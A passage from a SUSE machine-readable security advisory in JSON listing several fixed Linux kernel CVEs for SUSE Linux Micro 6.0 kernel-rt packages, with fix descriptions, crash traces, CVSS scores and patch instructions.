"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40363",
"url": "https://www.suse.com/security/cve/CVE-2025-40363"
},
{
"category": "external",
"summary": "SUSE Bug 1255102 for CVE-2025-40363",
"url": "https://bugzilla.suse.com/1255102"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 2.5,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "low"
}
],
"title": "CVE-2025-40363"
},
{
"cve": "CVE-2025-68168",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68168"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\njfs: fix uninitialized waitqueue in transaction manager\n\nThe transaction manager initialization in txInit() was not properly\ninitializing TxBlock[0].waitor waitqueue, causing a crash when\ntxEnd(0) is called on read-only filesystems.\n\nWhen a filesystem is mounted read-only, txBegin() returns tid=0 to\nindicate no transaction. However, txEnd(0) still gets called and\ntries to access TxBlock[0].waitor via tid_to_tblock(0), but this\nwaitqueue was never initialized because the initialization loop\nstarted at index 1 instead of 0.\n\nThis causes a \u0027non-static key\u0027 lockdep warning and system crash:\n INFO: trying to register non-static key in txEnd\n\nFix by ensuring all transaction blocks including TxBlock[0] have\ntheir waitqueues properly initialized during txInit().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68168",
"url": "https://www.suse.com/security/cve/CVE-2025-68168"
},
{
"category": "external",
"summary": "SUSE Bug 1255100 for CVE-2025-68168",
"url": "https://bugzilla.suse.com/1255100"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68168"
},
{
"cve": "CVE-2025-68171",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68171"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86/fpu: Ensure XFD state on signal delivery\n\nSean reported [1] the following splat when running KVM tests:\n\n WARNING: CPU: 232 PID: 15391 at xfd_validate_state+0x65/0x70\n Call Trace:\n \u003cTASK\u003e\n fpu__clear_user_states+0x9c/0x100\n arch_do_signal_or_restart+0x142/0x210\n exit_to_user_mode_loop+0x55/0x100\n do_syscall_64+0x205/0x2c0\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\n\nChao further identified [2] a reproducible scenario involving signal\ndelivery: a non-AMX task is preempted by an AMX-enabled task which\nmodifies the XFD MSR.\n\nWhen the non-AMX task resumes and reloads XSTATE with init values,\na warning is triggered due to a mismatch between fpstate::xfd and the\nCPU\u0027s current XFD state. fpu__clear_user_states() does not currently\nre-synchronize the XFD state after such preemption.\n\nInvoke xfd_update_state() which detects and corrects the mismatch if\nthere is a dynamic feature.\n\nThis also benefits the sigreturn path, as fpu__restore_sig() may call\nfpu__clear_user_states() when the sigframe is inaccessible.\n\n[ dhansen: minor changelog munging ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68171",
"url": "https://www.suse.com/security/cve/CVE-2025-68171"
},
{
"category": "external",
"summary": "SUSE Bug 1255255 for CVE-2025-68171",
"url": "https://bugzilla.suse.com/1255255"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68171"
},
{
"cve": "CVE-2025-68172",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68172"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: aspeed - fix double free caused by devm\n\nThe clock obtained via devm_clk_get_enabled() is automatically managed\nby devres and will be disabled and freed on driver detach. Manually\ncalling clk_disable_unprepare() in error path and remove function\ncauses double free.\n\nRemove the manual clock cleanup in both aspeed_acry_probe()\u0027s error\npath and aspeed_acry_remove().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68172",
"url": "https://www.suse.com/security/cve/CVE-2025-68172"
},
{
"category": "external",
"summary": "SUSE Bug 1255253 for CVE-2025-68172",
"url": "https://bugzilla.suse.com/1255253"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68172"
},
{
"cve": "CVE-2025-68174",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68174"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\namd/amdkfd: enhance kfd process check in switch partition\n\ncurrent switch partition only check if kfd_processes_table is empty.\nkfd_prcesses_table entry is deleted in kfd_process_notifier_release, but\nkfd_process tear down is in kfd_process_wq_release.\n\nconsider two processes:\n\nProcess A (workqueue) -\u003e kfd_process_wq_release -\u003e Access kfd_node member\nProcess B switch partition -\u003e amdgpu_xcp_pre_partition_switch -\u003e amdgpu_amdkfd_device_fini_sw\n-\u003e kfd_node tear down.\n\nProcess A and B may trigger a race as shown in dmesg log.\n\nThis patch is to resolve the race by adding an atomic kfd_process counter\nkfd_processes_count, it increment as create kfd process, decrement as\nfinish kfd_process_wq_release.\n\nv2: Put kfd_processes_count per kfd_dev, move decrement to kfd_process_destroy_pdds\nand bug fix. (Philip Yang)\n\n[3966658.307702] divide error: 0000 [#1] SMP NOPTI\n[3966658.350818] i10nm_edac\n[3966658.356318] CPU: 124 PID: 38435 Comm: kworker/124:0 Kdump: loaded Tainted\n[3966658.356890] Workqueue: kfd_process_wq kfd_process_wq_release [amdgpu]\n[3966658.362839] nfit\n[3966658.366457] RIP: 0010:kfd_get_num_sdma_engines+0x17/0x40 [amdgpu]\n[3966658.366460] Code: 00 00 e9 ac 81 02 00 66 66 2e 0f 1f 84 00 00 00 00 00 90 0f 1f 44 00 00 48 8b 4f 08 48 8b b7 00 01 00 00 8b 81 58 26 03 00 99 \u003cf7\u003e be b8 01 00 00 80 b9 70 2e 00 00 00 74 0b 83 f8 02 ba 02 00 00\n[3966658.380967] x86_pkg_temp_thermal\n[3966658.391529] RSP: 0018:ffffc900a0edfdd8 EFLAGS: 00010246\n[3966658.391531] RAX: 0000000000000008 RBX: ffff8974e593b800 RCX: ffff888645900000\n[3966658.391531] RDX: 0000000000000000 RSI: ffff888129154400 RDI: ffff888129151c00\n[3966658.391532] RBP: ffff8883ad79d400 R08: 0000000000000000 R09: ffff8890d2750af4\n[3966658.391532] R10: 0000000000000018 R11: 0000000000000018 R12: 0000000000000000\n[3966658.391533] R13: ffff8883ad79d400 R14: ffffe87ff662ba00 R15: ffff8974e593b800\n[3966658.391533] FS: 0000000000000000(0000) GS:ffff88fe7f600000(0000) knlGS:0000000000000000\n[3966658.391534] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[3966658.391534] CR2: 0000000000d71000 CR3: 000000dd0e970004 CR4: 0000000002770ee0\n[3966658.391535] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n[3966658.391535] DR3: 0000000000000000 DR6: 00000000fffe07f0 DR7: 0000000000000400\n[3966658.391536] PKRU: 55555554\n[3966658.391536] Call Trace:\n[3966658.391674] deallocate_sdma_queue+0x38/0xa0 [amdgpu]\n[3966658.391762] process_termination_cpsch+0x1ed/0x480 [amdgpu]\n[3966658.399754] intel_powerclamp\n[3966658.402831] kfd_process_dequeue_from_all_devices+0x5b/0xc0 [amdgpu]\n[3966658.402908] kfd_process_wq_release+0x1a/0x1a0 [amdgpu]\n[3966658.410516] coretemp\n[3966658.434016] process_one_work+0x1ad/0x380\n[3966658.434021] worker_thread+0x49/0x310\n[3966658.438963] kvm_intel\n[3966658.446041] ? process_one_work+0x380/0x380\n[3966658.446045] kthread+0x118/0x140\n[3966658.446047] ? __kthread_bind_mask+0x60/0x60\n[3966658.446050] ret_from_fork+0x1f/0x30\n[3966658.446053] Modules linked in: kpatch_20765354(OEK)\n[3966658.455310] kvm\n[3966658.464534] mptcp_diag xsk_diag raw_diag unix_diag af_packet_diag netlink_diag udp_diag act_pedit act_mirred act_vlan cls_flower kpatch_21951273(OEK) kpatch_18424469(OEK) kpatch_19749756(OEK)\n[3966658.473462] idxd_mdev\n[3966658.482306] kpatch_17971294(OEK) sch_ingress xt_conntrack amdgpu(OE) amdxcp(OE) amddrm_buddy(OE) amd_sched(OE) amdttm(OE) amdkcl(OE) intel_ifs iptable_mangle tcm_loop target_core_pscsi tcp_diag target_core_file inet_diag target_core_iblock target_core_user target_core_mod coldpgs kpatch_18383292(OEK) ip6table_nat ip6table_filter ip6_tables ip_set_hash_ipportip ip_set_hash_ipportnet ip_set_hash_ipport ip_set_bitmap_port xt_comment iptable_nat nf_nat iptable_filter ip_tables ip_set ip_vs_sh ip_vs_wrr ip_vs_rr ip_vs nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 sn_core_odd(OE) i40e overlay binfmt_misc tun bonding(OE) aisqos(OE) aisqo\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68174",
"url": "https://www.suse.com/security/cve/CVE-2025-68174"
},
{
"category": "external",
"summary": "SUSE Bug 1255327 for CVE-2025-68174",
"url": "https://bugzilla.suse.com/1255327"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68174"
},
{
"cve": "CVE-2025-68176",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68176"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nPCI: cadence: Check for the existence of cdns_pcie::ops before using it\n\ncdns_pcie::ops might not be populated by all the Cadence glue drivers. This\nis going to be true for the upcoming Sophgo platform which doesn\u0027t set the\nops.\n\nHence, add a check to prevent NULL pointer dereference.\n\n[mani: reworded subject and description]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68176",
"url": "https://www.suse.com/security/cve/CVE-2025-68176"
},
{
"category": "external",
"summary": "SUSE Bug 1255329 for CVE-2025-68176",
"url": "https://bugzilla.suse.com/1255329"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68176"
},
{
"cve": "CVE-2025-68178",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68178"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nblk-cgroup: fix possible deadlock while configuring policy\n\nFollowing deadlock can be triggered easily by lockdep:\n\nWARNING: possible circular locking dependency detected\n6.17.0-rc3-00124-ga12c2658ced0 #1665 Not tainted\n------------------------------------------------------\ncheck/1334 is trying to acquire lock:\nff1100011d9d0678 (\u0026q-\u003esysfs_lock){+.+.}-{4:4}, at: blk_unregister_queue+0x53/0x180\n\nbut task is already holding lock:\nff1100011d9d00e0 (\u0026q-\u003eq_usage_counter(queue)#3){++++}-{0:0}, at: del_gendisk+0xba/0x110\n\nwhich lock already depends on the new lock.\n\nthe existing dependency chain (in reverse order) is:\n\n-\u003e #2 (\u0026q-\u003eq_usage_counter(queue)#3){++++}-{0:0}:\n blk_queue_enter+0x40b/0x470\n blkg_conf_prep+0x7b/0x3c0\n tg_set_limit+0x10a/0x3e0\n cgroup_file_write+0xc6/0x420\n kernfs_fop_write_iter+0x189/0x280\n vfs_write+0x256/0x490\n ksys_write+0x83/0x190\n __x64_sys_write+0x21/0x30\n x64_sys_call+0x4608/0x4630\n do_syscall_64+0xdb/0x6b0\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\n-\u003e #1 (\u0026q-\u003erq_qos_mutex){+.+.}-{4:4}:\n __mutex_lock+0xd8/0xf50\n mutex_lock_nested+0x2b/0x40\n wbt_init+0x17e/0x280\n wbt_enable_default+0xe9/0x140\n blk_register_queue+0x1da/0x2e0\n __add_disk+0x38c/0x5d0\n add_disk_fwnode+0x89/0x250\n device_add_disk+0x18/0x30\n virtblk_probe+0x13a3/0x1800\n virtio_dev_probe+0x389/0x610\n really_probe+0x136/0x620\n __driver_probe_device+0xb3/0x230\n driver_probe_device+0x2f/0xe0\n __driver_attach+0x158/0x250\n bus_for_each_dev+0xa9/0x130\n driver_attach+0x26/0x40\n bus_add_driver+0x178/0x3d0\n driver_register+0x7d/0x1c0\n __register_virtio_driver+0x2c/0x60\n virtio_blk_init+0x6f/0xe0\n do_one_initcall+0x94/0x540\n kernel_init_freeable+0x56a/0x7b0\n kernel_init+0x2b/0x270\n ret_from_fork+0x268/0x4c0\n ret_from_fork_asm+0x1a/0x30\n\n-\u003e #0 (\u0026q-\u003esysfs_lock){+.+.}-{4:4}:\n __lock_acquire+0x1835/0x2940\n lock_acquire+0xf9/0x450\n __mutex_lock+0xd8/0xf50\n mutex_lock_nested+0x2b/0x40\n blk_unregister_queue+0x53/0x180\n __del_gendisk+0x226/0x690\n del_gendisk+0xba/0x110\n sd_remove+0x49/0xb0 [sd_mod]\n device_remove+0x87/0xb0\n device_release_driver_internal+0x11e/0x230\n device_release_driver+0x1a/0x30\n bus_remove_device+0x14d/0x220\n device_del+0x1e1/0x5a0\n __scsi_remove_device+0x1ff/0x2f0\n scsi_remove_device+0x37/0x60\n sdev_store_delete+0x77/0x100\n dev_attr_store+0x1f/0x40\n sysfs_kf_write+0x65/0x90\n kernfs_fop_write_iter+0x189/0x280\n vfs_write+0x256/0x490\n ksys_write+0x83/0x190\n __x64_sys_write+0x21/0x30\n x64_sys_call+0x4608/0x4630\n do_syscall_64+0xdb/0x6b0\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\nother info that might help us debug this:\n\nChain exists of:\n \u0026q-\u003esysfs_lock --\u003e \u0026q-\u003erq_qos_mutex --\u003e \u0026q-\u003eq_usage_counter(queue)#3\n\n Possible unsafe locking scenario:\n\n CPU0 CPU1\n ---- ----\n lock(\u0026q-\u003eq_usage_counter(queue)#3);\n lock(\u0026q-\u003erq_qos_mutex);\n lock(\u0026q-\u003eq_usage_counter(queue)#3);\n lock(\u0026q-\u003esysfs_lock);\n\nRoot cause is that queue_usage_counter is grabbed with rq_qos_mutex\nheld in blkg_conf_prep(), while queue should be freezed before\nrq_qos_mutex from other context.\n\nThe blk_queue_enter() from blkg_conf_prep() is used to protect against\npolicy deactivation, which is already protected with blkcg_mutex, hence\nconvert blk_queue_enter() to blkcg_mutex to fix this problem. Meanwhile,\nconsider that blkcg_mutex is held after queue is freezed from policy\ndeactivation, also convert blkg_alloc() to use GFP_NOIO.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68178",
"url": "https://www.suse.com/security/cve/CVE-2025-68178"
},
{
"category": "external",
"summary": "SUSE Bug 1255266 for CVE-2025-68178",
"url": "https://bugzilla.suse.com/1255266"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68178"
},
{
"cve": "CVE-2025-68180",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68180"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amd/display: Fix NULL deref in debugfs odm_combine_segments\n\nWhen a connector is connected but inactive (e.g., disabled by desktop\nenvironments), pipe_ctx-\u003estream_res.tg will be destroyed. Then, reading\nodm_combine_segments causes kernel NULL pointer dereference.\n\n BUG: kernel NULL pointer dereference, address: 0000000000000000\n #PF: supervisor read access in kernel mode\n #PF: error_code(0x0000) - not-present page\n PGD 0 P4D 0\n Oops: Oops: 0000 [#1] SMP NOPTI\n CPU: 16 UID: 0 PID: 26474 Comm: cat Not tainted 6.17.0+ #2 PREEMPT(lazy) e6a17af9ee6db7c63e9d90dbe5b28ccab67520c6\n Hardware name: LENOVO 21Q4/LNVNB161216, BIOS PXCN25WW 03/27/2025\n RIP: 0010:odm_combine_segments_show+0x93/0xf0 [amdgpu]\n Code: 41 83 b8 b0 00 00 00 01 75 6e 48 98 ba a1 ff ff ff 48 c1 e0 0c 48 8d 8c 07 d8 02 00 00 48 85 c9 74 2d 48 8b bc 07 f0 08 00 00 \u003c48\u003e 8b 07 48 8b 80 08 02 00\u003e\n RSP: 0018:ffffd1bf4b953c58 EFLAGS: 00010286\n RAX: 0000000000005000 RBX: ffff8e35976b02d0 RCX: ffff8e3aeed052d8\n RDX: 00000000ffffffa1 RSI: ffff8e35a3120800 RDI: 0000000000000000\n RBP: 0000000000000000 R08: ffff8e3580eb0000 R09: ffff8e35976b02d0\n R10: ffffd1bf4b953c78 R11: 0000000000000000 R12: ffffd1bf4b953d08\n R13: 0000000000040000 R14: 0000000000000001 R15: 0000000000000001\n FS: 00007f44d3f9f740(0000) GS:ffff8e3caa47f000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 0000000000000000 CR3: 00000006485c2000 CR4: 0000000000f50ef0\n PKRU: 55555554\n Call Trace:\n \u003cTASK\u003e\n seq_read_iter+0x125/0x490\n ? __alloc_frozen_pages_noprof+0x18f/0x350\n seq_read+0x12c/0x170\n full_proxy_read+0x51/0x80\n vfs_read+0xbc/0x390\n ? __handle_mm_fault+0xa46/0xef0\n ? do_syscall_64+0x71/0x900\n ksys_read+0x73/0xf0\n do_syscall_64+0x71/0x900\n ? count_memcg_events+0xc2/0x190\n ? handle_mm_fault+0x1d7/0x2d0\n ? do_user_addr_fault+0x21a/0x690\n ? exc_page_fault+0x7e/0x1a0\n entry_SYSCALL_64_after_hwframe+0x6c/0x74\n RIP: 0033:0x7f44d4031687\n Code: 48 89 fa 4c 89 df e8 58 b3 00 00 8b 93 08 03 00 00 59 5e 48 83 f8 fc 74 1a 5b c3 0f 1f 84 00 00 00 00 00 48 8b 44 24 10 0f 05 \u003c5b\u003e c3 0f 1f 80 00 00 00 00\u003e\n RSP: 002b:00007ffdb4b5f0b0 EFLAGS: 00000202 ORIG_RAX: 0000000000000000\n RAX: ffffffffffffffda RBX: 00007f44d3f9f740 RCX: 00007f44d4031687\n RDX: 0000000000040000 RSI: 00007f44d3f5e000 RDI: 0000000000000003\n RBP: 0000000000040000 R08: 0000000000000000 R09: 0000000000000000\n R10: 0000000000000000 R11: 0000000000000202 R12: 00007f44d3f5e000\n R13: 0000000000000003 R14: 0000000000000000 R15: 0000000000040000\n \u003c/TASK\u003e\n Modules linked in: tls tcp_diag inet_diag xt_mark ccm snd_hrtimer snd_seq_dummy snd_seq_midi snd_seq_oss snd_seq_midi_event snd_rawmidi snd_seq snd_seq_device x\u003e\n snd_hda_codec_atihdmi snd_hda_codec_realtek_lib lenovo_wmi_helpers think_lmi snd_hda_codec_generic snd_hda_codec_hdmi snd_soc_core kvm snd_compress uvcvideo sn\u003e\n platform_profile joydev amd_pmc mousedev mac_hid sch_fq_codel uinput i2c_dev parport_pc ppdev lp parport nvme_fabrics loop nfnetlink ip_tables x_tables dm_cryp\u003e\n CR2: 0000000000000000\n ---[ end trace 0000000000000000 ]---\n RIP: 0010:odm_combine_segments_show+0x93/0xf0 [amdgpu]\n Code: 41 83 b8 b0 00 00 00 01 75 6e 48 98 ba a1 ff ff ff 48 c1 e0 0c 48 8d 8c 07 d8 02 00 00 48 85 c9 74 2d 48 8b bc 07 f0 08 00 00 \u003c48\u003e 8b 07 48 8b 80 08 02 00\u003e\n RSP: 0018:ffffd1bf4b953c58 EFLAGS: 00010286\n RAX: 0000000000005000 RBX: ffff8e35976b02d0 RCX: ffff8e3aeed052d8\n RDX: 00000000ffffffa1 RSI: ffff8e35a3120800 RDI: 0000000000000000\n RBP: 0000000000000000 R08: ffff8e3580eb0000 R09: ffff8e35976b02d0\n R10: ffffd1bf4b953c78 R11: 0000000000000000 R12: ffffd1bf4b953d08\n R13: 0000000000040000 R14: 0000000000000001 R15: 0000000000000001\n FS: 00007f44d3f9f740(0000) GS:ffff8e3caa47f000(0000) 